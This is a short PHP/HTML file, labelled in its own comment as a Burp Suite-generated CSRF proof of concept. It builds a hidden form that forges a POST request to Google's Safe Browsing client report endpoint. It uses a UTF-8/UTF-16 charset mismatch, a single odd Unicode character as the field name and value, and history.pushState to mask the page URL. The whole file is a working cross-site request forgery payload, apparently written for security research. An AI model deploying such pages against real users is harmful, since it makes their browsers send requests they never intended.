

<?php
	header("Content-Type: text/html; charset=UTF-8");
?>
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <head>
<meta http-equiv="content-type" content="text/html; charset=UTF-16">

  </head>
  <body>
  ੳ
  <script>history.pushState('', '', '/')</script>
    <form action="https://safebrowsing.google.com/safebrowsing/clientreport/realtime" method="POST"  enctype="text/plain" accept-charset="utf-8">
    	<input type="hidden" name="ੳ" value="ੳ" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
